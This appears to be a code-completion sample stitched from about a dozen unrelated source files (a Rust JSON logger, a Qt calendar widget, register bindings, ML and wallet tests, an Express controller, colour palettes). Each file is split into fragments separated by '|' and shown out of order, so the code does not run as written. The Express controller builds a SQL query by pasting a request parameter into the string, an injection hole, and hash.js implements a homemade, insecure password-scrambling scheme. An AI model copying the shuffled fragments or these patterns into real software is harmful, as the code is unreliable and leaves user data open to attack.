//! The [`env_logger`](https://crates.io/crates/env_logger) is a crate that provides a way to declare what log levels are enabled for which modules \via a `RUST_LOG` env variable. See its documentation for
//! syntax of declaring crate and module filtering options.
//!
//! ## features
//!
//! * `iso-timestamps`
//!
//! By default, a timestamp field called `ts` is emitted with the current unix epic timestamp in seconds
//! You can replace this with IOS-8601 timestamps by enabling the `iso-timestamps` feature. Note, this will add `chrono` crate
//! to your dependency tree.
//!
//! ```toml
//! [dependencies]
//! json_env_logger = { version = "0.1", features = ["iso-timestamps"] }
//! ```
//! * `backtrace`
//!
//! When registering a panic hook with `panic_hook` by default backtraces are omitted. You can
//! annotate your error with then by enabling the `backtrace` feature.
//!
//! ```toml
//! [dependencies]
//! json_env_logger = { version = "0.1", features = ["backtrace"] }
//! ```
// export to make types accessible without
// requiring adding another Cargo.toml dependency
#[doc(hidden)]
pub extern crate env_logger;
use env_logger::Builder;
use log::kv;
use std::{
io::{self, Write},
panic, thread,
};
/// Register configured json env logger implementation with `log` crate.
///
/// Applications should ensure this fn gets called once and only once per application
/// lifetime
///
/// # panics
///
/// Panics if logger has already been configured
pub fn init() {
try_init().unwrap()
}
/// Register configured json env logger with `log` crate
///
/// Will yield an `log::SetLoggerError` when a logger has already
/// been configured
pub fn try_init() -> Result<(), log::SetLoggerError> {
builder().try_init()
}
/// Register a panic hook that serializes panic information as json
/// and logs via `log::error`
pub fn panic_hook() {
panic::set_hook(Box::new(|info| {
let thread = thread::current();
let thread = thread.name().unwrap_or("unnamed");
let msg = match info.payload().downcast_ref::<&'static str>() {
Some(s) => *s,
None => match info.payload().downcast_ref::<String>() {
Some(s) => &**s,
None => "Box<Any>",
},
};
match info.location() {
Some(location) => {
#[cfg(not(feature = "backtrace"))]
{
kv_log_macro::error!(
"panicked at '{}'", msg,
{
thread: thread,
location: format!("{}:{}", location.file(), location.line())
}
);
}
#[cfg(feature = "backtrace")]
{
kv_log_macro::error!(
"panicked at '{}'", msg,
{
thread: thread,
location: format!("{}:{}", location.file(), location.line()),
backtrace: format!("{:?}", backtrace::Backtrace::new())
}
);
}
}
None => {
#[cfg(not(feature = "backtrace"))]
{
kv_log_macro::error!("panicked at '{}'", msg, { thread: thread });
}
#[cfg(feature = "backtrace")]
{
kv_log_macro::error!(
"panicked at '{}'", msg,
{
thread: thread,
backtrace: format!("{:?}", backtrace::Backtrace::new())
}
);
}
}
}
}));
}
/// Yields the standard `env_logger::Builder` configured to log in JSON format
pub fn builder() -> Builder {
let mut builder = Builder::from_default_env();
builder.format(write);
builder
}
fn write<F>(
f: &mut F,
record: &log::Record,
) -> io::Result<()>
where
F: Write,
{
write!(f, "{{")?;
write!(f, "\"level\":\"{}\",", record.level())?;
#[cfg(feature = "iso-timestamps")]
{
write!(
f,
"\"ts\":\"{}\"",
chrono::Utc::now().to_rfc3339_opts(chrono::SecondsFormat::Millis, true)
)?;
}
#[cfg(not(feature = "iso-timestamps"))]
{
write!(
f,
"\"ts\":{}",
std::time::UNIX_EPOCH.elapsed().unwrap().as_millis()
)?;
}
write!(f, ",\"msg\":")?;
write_json_str(f, &record.args().to_string())?;
struct Visitor<'a, W: Write> {
writer: &'a mut W,
}
impl<'kvs, 'a, W: Write> kv::Visitor<'kvs> for Visitor<'a, W> {
fn visit_pair(
&mut self,
key: kv::Key<'kvs>,
val: kv::Value<'kvs>,
) -> Result<(), kv::Error> |
}
let mut visitor = Visitor { writer: f };
record.key_values().visit(&mut visitor).unwrap();
writeln!(f, "}}")
}
// until log kv Value impl serde::Serialize
fn write_json_str<W: io::Write>(
writer: &mut W,
raw: &str,
) -> std::io::Result<()> {
serde_json::to_writer(writer, raw)?;
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
use std::error::Error;
#[test]
fn writes_records_as_json() -> Result<(), Box<dyn Error>> {
let record = log::Record::builder()
.args(format_args!("hello"))
.level(log::Level::Info)
.build();
let mut buf = Vec::new();
write(&mut buf, &record)?;
let output = std::str::from_utf8(&buf)?;
assert!(serde_json::from_str::<serde_json::Value>(&output).is_ok());
Ok(())
}
#[test]
fn escapes_json_strings() -> Result<(), Box<dyn Error>> {
let mut buf = Vec::new();
write_json_str(
&mut buf, r#""
"#,
)?;
assert_eq!("\"\\\"\\n\\t\"", std::str::from_utf8(&buf)?);
Ok(())
}
}
| {
// This is REALLY hacky. Log values in quotes.
// This means bools log as "true" "false" (with quotes)
// and numbers also log inside quotes as strings.
// Every value is a string, but it is valid JSON.
write!(self.writer, ",\"{}\":\"{}\"", key, val).unwrap();
Ok(())
} |
QNCalendarWidget.py | #@+leo-ver=5-thin
#@+node:ekr.20160519123329.1: * @file ../plugins/QNCalendarWidget.py
#@@language python
"""
QNCalendarWidget.py - a QCalendarWidget which shows N months at a time.
Not a full QCalendarWidget implementation, just enough to work
with a QDateEdit (QNDateEdit) in a particular context.
[email protected], Tue Oct 15 09:53:38 2013
"""
import sys
import datetime
from leo.core import leoGlobals as g
from leo.core.leoQt import isQt6, QtCore, QtWidgets
#
# Fail fast, right after all imports.
g.assertUi('qt') # May raise g.UiTypeException, caught by the plugins manager.
def init():
return True # For unit tests.
class QNCalendarWidget(QtWidgets.QCalendarWidget):
def __init__(self, n=3, columns=3, year=None, month=None):
"""set up
:Parameters:
- `self`: the widget
- `n`: number of months to display
- `columns`: months to display before start a new row
- `year`: year of first calendar
- `month`: month of first calendar
"""
super().__init__()
self.build(n, columns, year=year, month=month)
def build(self, n=3, columns=3, year=None, month=None):
self.calendars = []
if year is None:
year = datetime.date.today().year
if month is None:
month = datetime.date.today().month
layout = QtWidgets.QGridLayout()
while self.layout().count():
self.layout().removeItem(self.layout().itemAt(0))
self.layout().addLayout(layout)
size = self.minimumSizeHint()
x, y = size.width(), size.height()
x *= min(n, columns)
y *= 1 + ((n-1) // columns)
self.setMinimumSize(QtCore.QSize(x, y) )
for i in range(n):
calendar = QtWidgets.QCalendarWidget()
calendar.i = i
calendar.setCurrentPage(year, month)
month += 1
if month == 13:
year += 1
month = 1
calendar.currentPageChanged.connect(
lambda year, month, cal=calendar:
self.currentPageChanged(year, month, cal))
calendar.clicked.connect(self.return_result)
calendar.activated.connect(self.return_result)
self.calendars.append(calendar)
layout.addWidget(calendar, i//columns, i%columns)
def currentPageChanged(self, year, month, cal):
"""currentPageChanged - Handle change of view
:Parameters:
- `self`: self
- `year`: new year
- `month`: new month
- `cal`: which calendar
"""
for i in range(cal.i):
month -= 1
if month == 0:
|
for calendar in self.calendars:
calendar.setCurrentPage(year, month)
month += 1
if month == 13:
year += 1
month = 1
activated = QtCore.pyqtSignal(QtCore.QDate)
def return_result(self, date):
"""return_result - Return result
:Parameters:
- `self`: self
- `cal`: the calendar that was activated
"""
for i in self.calendars:
old = i.blockSignals(True) # stop currentPageChanged firing
y, m = i.yearShown(), i.monthShown()
i.setSelectedDate(date)
i.setCurrentPage(y, m)
i.blockSignals(old)
self.activated.emit(date)
class QNDateEdit(QtWidgets.QDateEdit):
def __init__(self, parent=None, n=3, columns=3):
"""set up
:Parameters:
- `self`: the widget
- `n`: number of months to display
- `columns`: months to display before start a new row
"""
super().__init__(parent)
self.setCalendarPopup(True)
self.cw = QNCalendarWidget(n=n, columns=columns)
self.setCalendarWidget(self.cw)
def main():
app = QtWidgets.QApplication(sys.argv)
win = QtWidgets.QWidget()
l = QtWidgets.QVBoxLayout()
win.setLayout(l)
w = QtWidgets.QDateEdit()
w.setCalendarPopup(True)
l.addWidget(w)
l.addWidget(QNDateEdit())
l.addWidget(QNDateEdit(n=6))
l.addWidget(QNDateEdit(n=1))
l.addWidget(QNDateEdit(n=2))
l.addWidget(QNDateEdit(n=6, columns=2))
l.addWidget(QNDateEdit(n=6, columns=4))
l.addWidget(QNDateEdit(n=12, columns=4))
l.addWidget(QNDateEdit(columns=1))
last = QNDateEdit()
l.addWidget(last)
last.calendarWidget().build(5,4)
win.show()
if isQt6:
sys.exit(app.exec())
else:
sys.exit(app.exec_())
if __name__ == '__main__':
main()
#@-leo
| year -= 1
month = 12 |
format.rs | #[doc = "Reader of register FORMAT"]
pub type R = crate::R<u32, super::FORMAT>;
#[doc = "Writer for register FORMAT"]
pub type W = crate::W<u32, super::FORMAT>;
#[doc = "Register FORMAT `reset()`'s with value 0"]
impl crate::ResetValue for super::FORMAT {
type Type = u32;
#[inline(always)]
fn reset_value() -> Self::Type {
0
}
}
#[doc = "Frame format.\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum FORMAT_A {
#[doc = "0: Original I2S format."]
I2S = 0,
#[doc = "1: Alternate (left- or right-aligned) format."]
ALIGNED = 1,
}
impl From<FORMAT_A> for bool {
#[inline(always)]
fn from(variant: FORMAT_A) -> Self {
variant as u8 != 0
}
}
#[doc = "Reader of field `FORMAT`"]
pub type FORMAT_R = crate::R<bool, FORMAT_A>;
impl FORMAT_R {
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> FORMAT_A {
match self.bits {
false => FORMAT_A::I2S,
true => FORMAT_A::ALIGNED,
}
}
#[doc = "Checks if the value of the field is `I2S`"]
#[inline(always)]
pub fn is_i2s(&self) -> bool {
*self == FORMAT_A::I2S
}
#[doc = "Checks if the value of the field is `ALIGNED`"]
#[inline(always)]
pub fn is_aligned(&self) -> bool {
*self == FORMAT_A::ALIGNED
}
}
#[doc = "Write proxy for field `FORMAT`"]
pub struct FORMAT_W<'a> {
w: &'a mut W,
}
impl<'a> FORMAT_W<'a> {
#[doc = r"Writes `variant` to the field"]
#[inline(always)]
pub fn variant(self, variant: FORMAT_A) -> &'a mut W {
{
self.bit(variant.into())
}
}
#[doc = "Original I2S format."]
#[inline(always)]
pub fn i2s(self) -> &'a mut W {
self.variant(FORMAT_A::I2S)
}
#[doc = "Alternate (left- or right-aligned) format."]
#[inline(always)]
pub fn aligned(self) -> &'a mut W {
self.variant(FORMAT_A::ALIGNED)
}
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
} | pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !0x01) | ((value as u32) & 0x01);
self.w
}
}
impl R {
#[doc = "Bit 0 - Frame format."]
#[inline(always)]
pub fn format(&self) -> FORMAT_R {
FORMAT_R::new((self.bits & 0x01) != 0)
}
}
impl W {
#[doc = "Bit 0 - Frame format."]
#[inline(always)]
pub fn format(&mut self) -> FORMAT_W {
FORMAT_W { w: self }
}
} | #[doc = r"Clears the field bit"]
#[inline(always)] |
pyunit_NOPASS_hex_1897_glm_offset.py | import sys
sys.path.insert(1, "../../")
import h2o
def | (ip, port):
h2o.init(ip, port)
print 'Checking binomial models for GLM with and without offset'
print 'Import prostate dataset into H2O and R...'
prostate_hex = h2o.import_frame(h2o.locate("smalldata/prostate/prostate.csv"))
print "Checking binomial model without offset..."
prostate_glm_h2o = h2o.glm(x=prostate_hex["RACE", "DPROS", "DCAPS", "PSA", "VOL", "GLEASON"],
y=prostate_hex["CAPSULE"], training_frame=prostate_hex, family="binomial", standardize=False)
print "h2o residual: {0}".format(prostate_glm_h2o.residual_deviance())
print "r residual: {0}".format(379.053509501537)
assert abs(379.053509501537 - prostate_glm_h2o.residual_deviance()) < 0.1
print "Checking binomial model with offset..."
prostate_glm_h2o = h2o.glm(x=prostate_hex["RACE", "DPROS", "DCAPS", "PSA", "VOL", "GLEASON", "AGE"],
y=prostate_hex["CAPSULE"], training_frame=prostate_hex, family="binomial",
offset_column = "AGE", standardize = False)
print "h2o residual: {0}".format(prostate_glm_h2o.residual_deviance())
print "r residual: {0}".format(1515.91815848623)
assert abs(1515.91815848623 - prostate_glm_h2o.residual_deviance()) < 0.1
print "Checking binomial model without offset..."
prostate_glm_h2o = h2o.glm(x=prostate_hex["RACE", "DPROS", "DCAPS", "PSA", "VOL", "GLEASON"],
y=prostate_hex["CAPSULE"], training_frame=prostate_hex, family="poisson", standardize=False)
print "h2o residual: {0}".format(prostate_glm_h2o.residual_deviance())
print "r residual: {0}".format(216.339989007507)
assert abs(216.339989007507 - prostate_glm_h2o.residual_deviance()) < 0.1
print "Checking binomial model with offset..."
prostate_glm_h2o = h2o.glm(x=prostate_hex["RACE", "DPROS", "DCAPS", "PSA", "VOL", "GLEASON", "AGE"],
y=prostate_hex["CAPSULE"], training_frame=prostate_hex, family="poisson",
offset_column = "AGE", standardize = False)
print "h2o residual: {0}".format(prostate_glm_h2o.residual_deviance())
print "r residual: {0}".format(2761.76218461138)
assert abs(2761.76218461138 - prostate_glm_h2o.residual_deviance()) < 0.1
if __name__ == "__main__":
h2o.run_test(sys.argv, offset_1897)
| offset_1897 |
hash.js | var rans = [], tkeeper = [];
var i = 0, k = 0, j = 0;
var $uid, $psk, psw, rpsw;
/* let didcx_random_number_generator = function(min, max){
return Math.floor(Math.random() * (max - min)) + min;
} */
function | ($email, $password, $repeatPassword){
if($email == ""){
return -1;
}
if($password == ""){
return -2;
}
if($repeatPassword == ""){
return -3;
}
rans[i] = didcx_random_number_generator(0, 2288282819191911);
if(rans.length == 1000){
Passphrase($password, $repeatPassword);
//TK($password, $repeatPassword);
return;
}
else{
i++;
return RK($email, $password, $repeatPassword);
}
}
var riv;
function trand(tc, ts = 0, tkeeper = 0){
ts = didcx_random_number_generator(0, tkeeper.length-1);
ts = tkeeper[ts];
if(tc < ts){
return trand(tc, ts, tkeeper);
}
return riv = ts;
}
var dd = 0;
var tc;
async function sleepMode2($password, $repeatPassword, sleep_time = 121000, sleep_caller = null){
while(tkeeper.length != 200){ //181000 - 3mins 1s 301000 - 5mins 01s 61000 - 1mins 1s
await sleep(1);
tkeeper[k] = (new Date().getTime())*didcx_random_number_generator(5, 103);
if(tkeeper.length == 200){
var tr = didcx_random_number_generator(0, tkeeper.length-1);
tc = tkeeper[tr];
//window.console.log($password);
Passphrase($password, $repeatPassword);
break;
return;
}else{
window.__sleep = window.__sleep + 1;
}
k++;
}
}
function TK($password, $repeatPassword){
//window.console.log($password);
tkeeper[k] = didcx_random_number_generator(5, 57553689829132);
if(tkeeper.length == 6000){
var tr = didcx_random_number_generator(0, tkeeper.length-1);
tc = tkeeper[tr];
psw = $password;
rpsw = $repeatPassword;
//window.console.log($password);
//Passphrase($password, $repeatPassword);
return;
}else{
k++;
return TK($password, $repeatPassword);
}
//sleepMode2($password, $repeatPassword, 121000, null);
}
var pass, pass2, pks;
var p3, pkeek;
function Passphrase($password, $repeatPassword){
if($password == $repeatPassword){
//window.console.log($password);
//$password = $password.value.toString().trim();
//let $password = $password;//"HELLOWORLD";//"1010";//"HELLOWORLD";
var rk = didcx_random_number_generator(0, rans.length-1);
var rpk = rans[rk];
var sk = 0;
var passcodes = [], passcodes2 = [], passcodes3 = [];
if(rpk%2 == 1){
sk = rpk;
}
else{
return Passphrase($password, $repeatPassword);
}
//window.console.log($password);
//return $password;
for(var i = 0;i < $password.length;i++){
passcodes[i] = $password.charCodeAt(i)+sk;
}
dd = new Date();
TK($password, $repeatPassword);
trand(tc, 0, tkeeper);
var TTL = (tc-didcx_random_number_generator(1, 575536898291)) - riv;
tkeeper[didcx_random_number_generator(0, tkeeper.length-1)] = TTL;
for(var i = 0;i < $password.length;i++){
passcodes2[i] = ((passcodes[i]+TTL)+2147483647)+Number(getCookieValue("TTLIP"));
}
for(var i = 0;i < $password.length;i++){
passcodes3[i] = (Math.trunc(Math.floor((passcodes2[i]))));
}
pass = [], pass2 = [[], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], []];
p3 = [[], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], []];
pkeek = [];
pass = converter(passcodes3, pass, pass2, p3);
var pks = [TTL, sk];
$uid = JSON.stringify(pass);
$psk = JSON.stringify(pks);
//ListenOnSignIn();
//ListenOnSignUp();
}else{
return "dd;d;d";
}
}
function converter(array = [], pass = [], pass2 = [], pass3 = []){
for(var g = 0;g < array.length;g++){
var garbage = ['@', '#', '!', '$', '%', '^', '&', '*', '(', ')', '-', '_', '+', '=', '[', ']', '|', '`', '~'];
var str = array[g].toString()+'@';
for(var k = 0; k < str.length;k++){
if(str[k] == '@'){
p3[g][k] = str[k];
pass2[g][k] = str[k];
}else{
p3[g][k] = str[k];
pass2[g][k] = String.fromCharCode(str[k]);
}
}
}
for(var g = 0;g < array.length;g++){
pkeek[g] = [[p3[g]]];
pass[g] = [[pass2[g]]];
}
return pass;
} | RK |
conftest.py | import pytest
import json
from os import path
from fixture.fixture import Fixture
with open(path.join(path.dirname(path.abspath(__file__)), 'config.json')) as f:
config = json.load(f)
@pytest.fixture(scope="session")
def app(request):
| fixture = Fixture(admin_root=config['admin']['url'],
admin_countries_url=config['admin']['countries_url'],
admin_zones_url=config['admin']['zones_url'],
admin_catalog_url=config['admin']['catalog_url'],
admin_name=config['admin']['name'],
admin_password=config['admin']['password'],
shop_root=config['shop']['url'])
request.addfinalizer(fixture.destroy)
return fixture |
|
mod.rs |
mod icon_plugin;
mod vscode;
pub use {
icon_plugin::IconPlugin,
};
pub fn | (icon_set: &str) -> Option<Box<dyn IconPlugin + Send + Sync>> {
match icon_set {
"vscode" => Some(Box::new(vscode::VsCodeIconPlugin::new())),
_ => None,
}
}
| icon_plugin |
rpc_signer.py | #!/usr/bin/env python3
# Copyright (c) 2017-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test external signer.
Verify that a blinkhashd node can use an external signer command.
See also wallet_signer.py for tests that require wallet context.
"""
import os
import platform
from test_framework.test_framework import BlinkhashTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
class RPCSignerTest(BlinkhashTestFramework):
def mock_signer_path(self):
path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'mocks', 'signer.py')
if platform.system() == "Windows":
return "py " + path
else:
return path
def set_test_params(self):
self.num_nodes = 4
self.extra_args = [
[],
[f"-signer={self.mock_signer_path()}", '-keypool=10'],
[f"-signer={self.mock_signer_path()}", '-keypool=10'],
["-signer=fake.py"],
]
def skip_test_if_missing_module(self):
self.skip_if_no_external_signer()
def set_mock_result(self, node, res):
with open(os.path.join(node.cwd, "mock_result"), "w", encoding="utf8") as f:
f.write(res)
def clear_mock_result(self, node):
os.remove(os.path.join(node.cwd, "mock_result"))
def run_test(self):
self.log.debug(f"-signer={self.mock_signer_path()}")
assert_raises_rpc_error(-1, 'Error: restart blinkhashd with -signer=<cmd>',
self.nodes[0].enumeratesigners
)
# Handle script missing:
assert_raises_rpc_error(-1, 'execve failed: No such file or directory',
self.nodes[3].enumeratesigners
)
# Handle error thrown by script
self.set_mock_result(self.nodes[1], "2")
assert_raises_rpc_error(-1, 'RunCommandParseJSON error',
self.nodes[1].enumeratesigners
)
self.clear_mock_result(self.nodes[1])
self.set_mock_result(self.nodes[1], '0 [{"type": "trezor", "model": "trezor_t", "error": "fingerprint not found"}]')
assert_raises_rpc_error(-1, 'fingerprint not found',
self.nodes[1].enumeratesigners
)
self.clear_mock_result(self.nodes[1])
result = self.nodes[1].enumeratesigners()
assert_equal(len(result['signers']), 2) | assert_equal(result['signers'][0]["name"], "trezor_t")
if __name__ == '__main__':
RPCSignerTest().main() | assert_equal(result['signers'][0]["fingerprint"], "00000001") |
DescribeNotificationConfigurationsRequest.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkess.endpoint import endpoint_data
class DescribeNotificationConfigurationsRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Ess', '2014-08-28', 'DescribeNotificationConfigurations','ess')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerAccount(self):
return self.get_query_params().get('ResourceOwnerAccount')
def set_ResourceOwnerAccount(self,ResourceOwnerAccount):
self.add_query_param('ResourceOwnerAccount',ResourceOwnerAccount)
def get_ScalingGroupId(self):
return self.get_query_params().get('ScalingGroupId')
def | (self,ScalingGroupId):
self.add_query_param('ScalingGroupId',ScalingGroupId)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId) | set_ScalingGroupId |
moduleController.ts | import mysql from 'mysql';
import express, {Request, Response, urlencoded} from 'express';
| let sql = `SELECT * FROM module JOIN coursemodule ON module.module_id = coursemodule.module_id AND coursemodule.course_id=${course_id}`;
db.query(sql, (err: any, result: any) =>{
if(err){
console.log(err);
}
res.send(result);
});
}); | import db from '../config/config';
export const getModuleforCourse = ((req: Request, res: Response) => {
let course_id = req.params.id;
|
UrlList.js | // src/network/UrlList.js
const BASE_URL = 'https://master-covid-19-api-laeyoung.endpoint.ainize.ai/';
const API_BASE_URL = BASE_URL + 'jhu-edu';
const BASE_URL_PCM = 'https://raw.githubusercontent.com/pcm-dpc/COVID-19/master/dati-json/';
var UrlList = {
/**
* Your App's URLs
*/
Corona: {
getBriefUrl: () => {
return `${API_BASE_URL}/brief`;
},
getLatestUrl: () => {
return `${API_BASE_URL}/latest`;
},
getTimeseriesUrl: () => {
return `${API_BASE_URL}/timeseries`;
},
getNazioneUrl: () => {
return `${BASE_URL_PCM}/dpc-covid19-ita-andamento-nazionale.json`;
},
getRegioniUrl: () => {
return `${BASE_URL_PCM}/dpc-covid19-ita-regioni.json`;
},
getProvinceUrl: () => {
return `${BASE_URL_PCM}/dpc-covid19-ita-province.json`;
},
getSpainUrl: () => {
return 'https://raw.githubusercontent.com/victorvicpal/COVID19_es/master/data/csv_data/data/dataCOVID19_es.csv'
}
},
}
| module.exports = UrlList; |
|
ex1-return-one-existing-name-if-else.rs | fn main() { } | fn foo<'a>(x: &'a i32, y: &i32) -> &'a i32 {
if x > y { x } else { y } //~ ERROR explicit lifetime
}
|
|
application.js | // This file is automatically compiled by Webpack, along with any other files
// present in this directory. You're encouraged to place your actual application logic in
// a relevant structure within app/javascript and only use these pack files to reference
// that code so it'll be compiled.
import Rails from "@rails/ujs"
import Turbolinks from "turbolinks"
import * as ActiveStorage from "@rails/activestorage" | import "channels"
Rails.start()
Turbolinks.start()
ActiveStorage.start() | |
colorbrewer.js | // This product includes color specifications and designs developed by Cynthia Brewer (http://colorbrewer.org/).
// JavaScript specs as packaged in the D3 library (d3js.org). Please see license at http://colorbrewer.org/export/LICENSE.txt
var colorbrewer = {YlGn: {
3: ["#f7fcb9","#addd8e","#31a354"],
4: ["#ffffcc","#c2e699","#78c679","#238443"],
5: ["#ffffcc","#c2e699","#78c679","#31a354","#006837"],
6: ["#ffffcc","#d9f0a3","#addd8e","#78c679","#31a354","#006837"],
7: ["#ffffcc","#d9f0a3","#addd8e","#78c679","#41ab5d","#238443","#005a32"],
8: ["#ffffe5","#f7fcb9","#d9f0a3","#addd8e","#78c679","#41ab5d","#238443","#005a32"],
9: ["#ffffe5","#f7fcb9","#d9f0a3","#addd8e","#78c679","#41ab5d","#238443","#006837","#004529"]
},YlGnBu: {
3: ["#edf8b1","#7fcdbb","#2c7fb8"],
4: ["#ffffcc","#a1dab4","#41b6c4","#225ea8"],
5: ["#ffffcc","#a1dab4","#41b6c4","#2c7fb8","#253494"],
6: ["#ffffcc","#c7e9b4","#7fcdbb","#41b6c4","#2c7fb8","#253494"],
7: ["#ffffcc","#c7e9b4","#7fcdbb","#41b6c4","#1d91c0","#225ea8","#0c2c84"],
8: ["#ffffd9","#edf8b1","#c7e9b4","#7fcdbb","#41b6c4","#1d91c0","#225ea8","#0c2c84"],
9: ["#ffffd9","#edf8b1","#c7e9b4","#7fcdbb","#41b6c4","#1d91c0","#225ea8","#253494","#081d58"]
},GnBu: {
3: ["#e0f3db","#a8ddb5","#43a2ca"],
4: ["#f0f9e8","#bae4bc","#7bccc4","#2b8cbe"],
5: ["#f0f9e8","#bae4bc","#7bccc4","#43a2ca","#0868ac"],
6: ["#f0f9e8","#ccebc5","#a8ddb5","#7bccc4","#43a2ca","#0868ac"],
7: ["#f0f9e8","#ccebc5","#a8ddb5","#7bccc4","#4eb3d3","#2b8cbe","#08589e"],
8: ["#f7fcf0","#e0f3db","#ccebc5","#a8ddb5","#7bccc4","#4eb3d3","#2b8cbe","#08589e"],
9: ["#f7fcf0","#e0f3db","#ccebc5","#a8ddb5","#7bccc4","#4eb3d3","#2b8cbe","#0868ac","#084081"]
},BuGn: {
3: ["#e5f5f9","#99d8c9","#2ca25f"],
4: ["#edf8fb","#b2e2e2","#66c2a4","#238b45"],
5: ["#edf8fb","#b2e2e2","#66c2a4","#2ca25f","#006d2c"],
6: ["#edf8fb","#ccece6","#99d8c9","#66c2a4","#2ca25f","#006d2c"],
7: ["#edf8fb","#ccece6","#99d8c9","#66c2a4","#41ae76","#238b45","#005824"],
8: ["#f7fcfd","#e5f5f9","#ccece6","#99d8c9","#66c2a4","#41ae76","#238b45","#005824"],
9: ["#f7fcfd","#e5f5f9","#ccece6","#99d8c9","#66c2a4","#41ae76","#238b45","#006d2c","#00441b"]
},PuBuGn: {
3: ["#ece2f0","#a6bddb","#1c9099"],
4: ["#f6eff7","#bdc9e1","#67a9cf","#02818a"],
5: ["#f6eff7","#bdc9e1","#67a9cf","#1c9099","#016c59"],
6: ["#f6eff7","#d0d1e6","#a6bddb","#67a9cf","#1c9099","#016c59"],
7: ["#f6eff7","#d0d1e6","#a6bddb","#67a9cf","#3690c0","#02818a","#016450"],
8: ["#fff7fb","#ece2f0","#d0d1e6","#a6bddb","#67a9cf","#3690c0","#02818a","#016450"],
9: ["#fff7fb","#ece2f0","#d0d1e6","#a6bddb","#67a9cf","#3690c0","#02818a","#016c59","#014636"]
},PuBu: {
3: ["#ece7f2","#a6bddb","#2b8cbe"],
4: ["#f1eef6","#bdc9e1","#74a9cf","#0570b0"],
5: ["#f1eef6","#bdc9e1","#74a9cf","#2b8cbe","#045a8d"],
6: ["#f1eef6","#d0d1e6","#a6bddb","#74a9cf","#2b8cbe","#045a8d"],
7: ["#f1eef6","#d0d1e6","#a6bddb","#74a9cf","#3690c0","#0570b0","#034e7b"],
8: ["#fff7fb","#ece7f2","#d0d1e6","#a6bddb","#74a9cf","#3690c0","#0570b0","#034e7b"],
9: ["#fff7fb","#ece7f2","#d0d1e6","#a6bddb","#74a9cf","#3690c0","#0570b0","#045a8d","#023858"]
},BuPu: {
3: ["#e0ecf4","#9ebcda","#8856a7"],
4: ["#edf8fb","#b3cde3","#8c96c6","#88419d"],
5: ["#edf8fb","#b3cde3","#8c96c6","#8856a7","#810f7c"],
6: ["#edf8fb","#bfd3e6","#9ebcda","#8c96c6","#8856a7","#810f7c"],
7: ["#edf8fb","#bfd3e6","#9ebcda","#8c96c6","#8c6bb1","#88419d","#6e016b"],
8: ["#f7fcfd","#e0ecf4","#bfd3e6","#9ebcda","#8c96c6","#8c6bb1","#88419d","#6e016b"],
9: ["#f7fcfd","#e0ecf4","#bfd3e6","#9ebcda","#8c96c6","#8c6bb1","#88419d","#810f7c","#4d004b"]
},RdPu: {
3: ["#fde0dd","#fa9fb5","#c51b8a"],
4: ["#feebe2","#fbb4b9","#f768a1","#ae017e"],
5: ["#feebe2","#fbb4b9","#f768a1","#c51b8a","#7a0177"],
6: ["#feebe2","#fcc5c0","#fa9fb5","#f768a1","#c51b8a","#7a0177"],
7: ["#feebe2","#fcc5c0","#fa9fb5","#f768a1","#dd3497","#ae017e","#7a0177"],
8: ["#fff7f3","#fde0dd","#fcc5c0","#fa9fb5","#f768a1","#dd3497","#ae017e","#7a0177"],
9: ["#fff7f3","#fde0dd","#fcc5c0","#fa9fb5","#f768a1","#dd3497","#ae017e","#7a0177","#49006a"]
},PuRd: {
3: ["#e7e1ef","#c994c7","#dd1c77"],
4: ["#f1eef6","#d7b5d8","#df65b0","#ce1256"],
5: ["#f1eef6","#d7b5d8","#df65b0","#dd1c77","#980043"],
6: ["#f1eef6","#d4b9da","#c994c7","#df65b0","#dd1c77","#980043"],
7: ["#f1eef6","#d4b9da","#c994c7","#df65b0","#e7298a","#ce1256","#91003f"],
8: ["#f7f4f9","#e7e1ef","#d4b9da","#c994c7","#df65b0","#e7298a","#ce1256","#91003f"],
